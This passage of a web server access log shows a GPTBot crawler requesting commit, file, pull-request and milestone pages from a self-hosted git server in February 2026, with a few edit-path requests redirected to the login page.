"/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" -[17/Feb/2026:16:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11665] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" -[17/Feb/2026:16:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" -[17/Feb/2026:16:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" -[17/Feb/2026:16:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11666] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" -[17/Feb/2026:16:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" -[17/Feb/2026:16:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" -[17/Feb/2026:16:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11637] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" -[17/Feb/2026:16:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11665] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" -[17/Feb/2026:16:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 25945] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:16:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2fusdkrw_fetcher.py" [Client 74.7.227.38] [Length 23157] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:16:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2fkrx_gold_fetcher.py" [Client 74.7.227.38] [Length 22892] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:16:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 25944] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:16:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3" [Client 74.7.227.38] [Length 30697] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 34900] [Gzip 7.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:16:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2" [Client 74.7.227.38] [Length 30990] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2finvesting_fetcher.py" [Client 74.7.227.38] [Length 23804] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:16:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibstdc%2b%2b-6.dll" [Client 74.7.227.38] [Length 23782] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:16:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2fapi_fetcher.py" [Client 74.7.227.38] [Length 23731] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:16:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1" [Client 74.7.227.38] [Length 30962] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 21155] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:16:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?state=all" [Client 74.7.227.38] [Length 8457] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:16:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:16:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14286] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14309] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14309] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:16:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11795] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" -[17/Feb/2026:16:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13230] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" -[17/Feb/2026:16:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13230] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" -[17/Feb/2026:16:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" -[17/Feb/2026:16:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=Python&q=&sort=recentupdate" [Client 74.7.227.38] [Length 6313] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:16:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:16:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:16:37:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:37:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:16:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:16:37:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 21629] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:16:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 